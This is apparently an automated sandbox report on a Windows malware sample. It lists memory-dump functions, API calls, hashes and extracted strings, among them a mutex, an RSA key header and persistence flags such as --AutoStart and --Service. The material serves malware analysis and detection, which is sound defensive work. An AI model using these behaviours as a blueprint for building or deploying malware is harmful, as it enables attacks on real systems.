                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FirstModule32
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3757679902-0
                                                                                                                                                                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction ID: 5913ee32bd90e5e56cf33a423c4f142049f2b35104bcfc633459dc619acddc51
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58F0F6316003186FD7203FF4A89CB6F76E9BF48725F500628E682914C0CB70E8455A60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 020A0485, Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 020A04D6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244540402.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                                                                                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction ID: ba3bf5479a8f91c545060c518b7635c3f8840ccb4162172e5163adb8da631d68
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B6113C79A00208EFDB41DF98C985E99BBF5AF08350F458094F9489B361D371EA90EF90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                      Function 03B43F16, Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 03B43F51
                                                                                                                                                                                                        • Part of subcall function 03B45BA8: __getptd_noexit.LIBCMT ref: 03B45BA8
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 03B43FEA
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 03B44020
                                                                                                                                                                                                      • __gmtime64_s.LIBCMT ref: 03B4403D
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 03B44093
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03B440AF
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 03B440C6
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03B440E4
                                                                                                                                                                                                      • __allrem.LIBCMT ref: 03B440FB
                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03B44119
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 03B4418A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 384356119-0
                                                                                                                                                                                                      • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction ID: 951f327c7b618a9d041b81247ba2ddc293e525ce1c89997f4fe3d06d3447bfca
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D071E775A00716ABE714EF7ACC80B6AB7F9EF10328F1841B9F814DA680E770D9609794
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B484AB, Relevance: 16.6, APIs: 11, Instructions: 92COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free$ExitProcess___crt
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1022109855-0
                                                                                                                                                                                                      • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                      • Instruction ID: 9155ce61ad3a61634a1806c538568bb5cef0ca56eadf3b1de15e8f049e03aacd
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C318435D00350DBCF21DF58FC8489977A4FB1432870886BAE9059B2A0CBB559D9BF99
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B6FC0C, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03B6FC1F
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03B6FC34
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03B6FC4D
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03B6FC62
                                                                                                                                                                                                      • std::regex_error::regex_error.LIBCPMT ref: 03B6FC74
                                                                                                                                                                                                        • Part of subcall function 03B6F914: std::exception::exception.LIBCMT ref: 03B6F92E
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03B6FC82
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03B6FC9B
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03B6FCB0
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception$std::regex_error::regex_error
                                                                                                                                                                                                      • String ID: leM
                                                                                                                                                                                                      • API String ID: 2862078307-2926266777
                                                                                                                                                                                                      • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                      • Instruction ID: abeacdb3e9c4954df50caa1f0979b601912260214585f2f8c0aafb7d454421b2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5311BC79C0030DBBCF00FFA9D455DEDBB7CAA04244B5085A6BD149B641EB74A3498B94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B2F010, Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3721157643-0
                                                                                                                                                                                                      • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                      • Instruction ID: 7fb08caeb92472c12a1fac27e15428a919c4066db46a9153d833210881aee795
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 70113ABA9007647AC661F6B90C11EFF7BEC9F45305F0801F9FA4CD9280DA185A04B3B5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B31960, Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 65388428-0
                                                                                                                                                                                                      • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                      • Instruction ID: fedcb303fe7443aa4b86379027c9b93d8adb383c021ba3e139956f9f72677d2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58515C71D40219ABDB10EBA5DC85FEFBBBCFB04708F140075FA05BA180E7749A018BA5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B2F210, Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 217217746-0
                                                                                                                                                                                                      • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                      • Instruction ID: 7f4ee3824c5b1a34a1c4c084822e8466d2f5596dd321a80ff74b7e3bf41acc61
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 38518DB5D40219AADF11DFA5DC46FFEBBB8EB04708F2001B9F905B6180D775AA058BA4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B2F440, Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 217217746-0
                                                                                                                                                                                                      • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                      • Instruction ID: 27006c73d48fc3912e496b6ad697f4041e431c3254624133ccf48662a6f2e3d0
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DF515075D40219AADF11DFA5DC46FFEBBB8EB04708F2401B9F905B6180E774AA058BA4
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03BE66D9, Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __getptd_noexit.LIBCMT ref: 03BE66DD
                                                                                                                                                                                                        • Part of subcall function 03B459BF: __calloc_crt.LIBCMT ref: 03B459E2
                                                                                                                                                                                                        • Part of subcall function 03B459BF: __initptd.LIBCMT ref: 03B45A04
                                                                                                                                                                                                      • __calloc_crt.LIBCMT ref: 03BE6700
                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 03BE671E
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 03BE673B
                                                                                                                                                                                                      • __get_sys_err_msg.LIBCMT ref: 03BE676D
                                                                                                                                                                                                      • __invoke_watson.LIBCMT ref: 03BE678B
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4066021419-0
                                                                                                                                                                                                      • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                      • Instruction ID: f75f0e1d2cb67a8b859e45663b60515c1023412d91019bbc485c3360c2007b43
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7E1194356017146BEB21FA699C40BAB779CEF2166DF0444F6FD489A241E731DD1062D8
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B42AD0, Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1559183368-0
                                                                                                                                                                                                      • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                      • Instruction ID: 603db0bd256a43c124b696325edfe712c501f8c6a72c8ef9028806de306ead41
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2519230A003059BDB29CF69898066EB7B5EF40328F188BF9F8759E2D1D7719950FB48
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B32670, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                      • API String ID: 2102423945-2746444292
                                                                                                                                                                                                      • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                      • Instruction ID: 85fa2de8c30fd017e89e1247a46389f5df1ac6207642c52e33646ee0eb3b8a0c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 27E16E75D00229ABDF24DBA0CD89FEEB7B8FF04308F1445B9E509AA190EB746A45CF54
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B2D8B0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset
                                                                                                                                                                                                      • String ID: $$$(
                                                                                                                                                                                                      • API String ID: 2102423945-3551151888
                                                                                                                                                                                                      • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                      • Instruction ID: 448aafcef20c30c03c0a620a5957dfe12d1fd2df809871eb92c5706d03beb4b3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9791B375D00228DBEF10DFA4CC59BDDBBB4AF05308F1441A9E5197B2C0DBB65A48CB65
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B6FBDE, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • std::exception::exception.LIBCMT ref: 03B6FBF1
                                                                                                                                                                                                      • __CxxThrowException@8.LIBCMT ref: 03B6FC06
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception@8Throwstd::exception::exception
                                                                                                                                                                                                      • String ID: TeM$TeM
                                                                                                                                                                                                      • API String ID: 3728558374-3870166017
                                                                                                                                                                                                      • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                      • Instruction ID: 72f4db4aa0e1c1cf644fb8d82decfe15967c17bbdfde487e306d41380675c63a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FCD06779C0030CBBCF00EFA9D459DDDBBB8AA04348B1084A6AD149B241EA74A3498B94
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B2D0E0, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 03B4197D: __wfsopen.LIBCMT ref: 03B41988
                                                                                                                                                                                                      • _fgetws.LIBCMT ref: 03B2D15C
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: __wfsopen_fgetws
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 853134316-0
                                                                                                                                                                                                      • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                      • Instruction ID: e484fc66fe1ce99a389150a823ca623c9f78eba2f71a26a93d17ababddad2b2f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D919575D003299BCF20DF64CC45BAEBBB5FF04218F1406BDE829A7240E775AA14CB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 03B2D540, Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000005.00000002.244718914.0000000003B20000.00000040.00000001.sdmp, Offset: 03B20000, based on PE: false
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1783060780-0
                                                                                                                                                                                                      • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                      • Instruction ID: d13f86b5afbb7883ffaf8da8ae7fc5b0dee09183713b0f2b96c44020e8a589be
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9A19DB4C00358ABEF11EBA4C849BDEBF75EF14308F1401B8E4157E291D7B65A48DBA6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Analysis Process: Ln0LqSBLhS.exe PID: 6664 Parent PID: 6632 Ln0LqSBLhS.exeCOMMON

                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                      Function 00419F90, Relevance: 178.3, APIs: 65, Strings: 36, Instructions: 1565COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040CF10: _memset.LIBCMT ref: 0040CF4A
                                                                                                                                                                                                        • Part of subcall function 0040CF10: InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 0040CF5F
                                                                                                                                                                                                        • Part of subcall function 0040CF10: InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040CFA6
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 00419FC4
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00419FD2
                                                                                                                                                                                                      • SetPriorityClass.KERNEL32(00000000,00000080), ref: 00419FDA
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00419FE4
                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000400,?,?,00000000,00831918,?), ref: 0041A0BB
                                                                                                                                                                                                      • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A0C2
                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(?,?), ref: 0041A161
                                                                                                                                                                                                        • Part of subcall function 004124E0: CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                                                                                                                        • Part of subcall function 004124E0: GetLastError.KERNEL32 ref: 00412509
                                                                                                                                                                                                        • Part of subcall function 004124E0: CloseHandle.KERNEL32 ref: 0041251C
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000006.00000002.359554662.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000006.00000002.360147501.000000000051A000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360168454.0000000000529000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      • Associated: 00000006.00000002.360179137.000000000052B000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ErrorLast$FileInternetOpen$ClassCloseCommandCreateCurrentHandleLineModuleMutexNamePathPriorityProcessRemoveSpec_memset
                                                                                                                                                                                                      • String ID: IsNotAutoStart$ IsNotTask$%username%$-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2ConnkmHf3F5UYxtsjHW\\nSiM2IvLtvv4J1\/ft1bhz0es$--Admin$--AutoStart$--ForNetRes$--Service$--Task$<$C:\Program Files (x86)\Google\$C:\Program Files (x86)\Internet Explorer\$C:\Program Files (x86)\Mozilla Firefox\$C:\Program Files\Google\$C:\Program Files\Internet Explorer\$C:\Program Files\Mozilla Firefox\$C:\Windows\$D:\Program Files (x86)\Google\$D:\Program Files (x86)\Internet Explorer\$D:\Program Files (x86)\Mozilla Firefox\$D:\Program Files\Google\$D:\Program Files\Internet Explorer\$D:\Program Files\Mozilla Firefox\$D:\Windows\$F:\$I:\5d2860c89d774.jpg$IsAutoStart$IsTask$X1P$list<T> too long$runas$x*P$x2Q${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}$7P
                                                                                                                                                                                                      • API String ID: 2957410896-2208776198
                                                                                                                                                                                                      • Opcode ID: 93bb03fc8e5cb21add6eacbeb2f22c7c029ce7265708f5b7cc0db0444f75488d
                                                                                                                                                                                                      • Instruction ID: ef0c4ad91a93ebed44a25fa424fadbe3f4bc75453965ff7ad5f6b92dd0de7051
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93bb03fc8e5cb21add6eacbeb2f22c7c029ce7265708f5b7cc0db0444f75488d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 99D2F670604341ABD710EF21D895BDF77E5BF94308F00492EF48587291EB78AA99CB9B
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Function 00481920, Relevance: 135.3, APIs: 49, Strings: 28, Instructions: 587libraryloadermemoryCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                                                                                                                                                                                      • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
                                                                                                                                                                                                      • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00481C15
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00481D45
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
